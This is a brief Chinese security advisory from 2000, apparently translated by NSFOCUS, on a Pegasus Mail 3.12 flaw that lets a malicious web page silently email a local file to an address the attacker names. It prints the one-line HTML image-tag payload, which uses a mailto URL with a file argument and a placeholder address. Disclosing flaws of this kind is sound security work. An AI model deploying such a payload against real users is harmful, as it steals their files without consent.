安全研究
安全漏洞
David Harris Pegasus Email文件转发漏洞
发布日期:2000-10-04
更新日期:2000-10-04
受影响系统:David Harris Pegasus Mail 3.12
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
如果浏览者使用Pegasus Mail客户端,恶意的WWW站点可以复制远程系统的已知文件。
如果在HTML文档中嵌入以下代码,在用户浏览此网页时,本地文件可以在没有任何警告的情
况下自动从Pegasus Mail客户端发送到指定的email地址。
<img sr c="mailto:email@address.com -F c:\path\file.ext">
来源:<
ImranG@btinternet.com>
建议:
尚无
浏览次数:5832
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |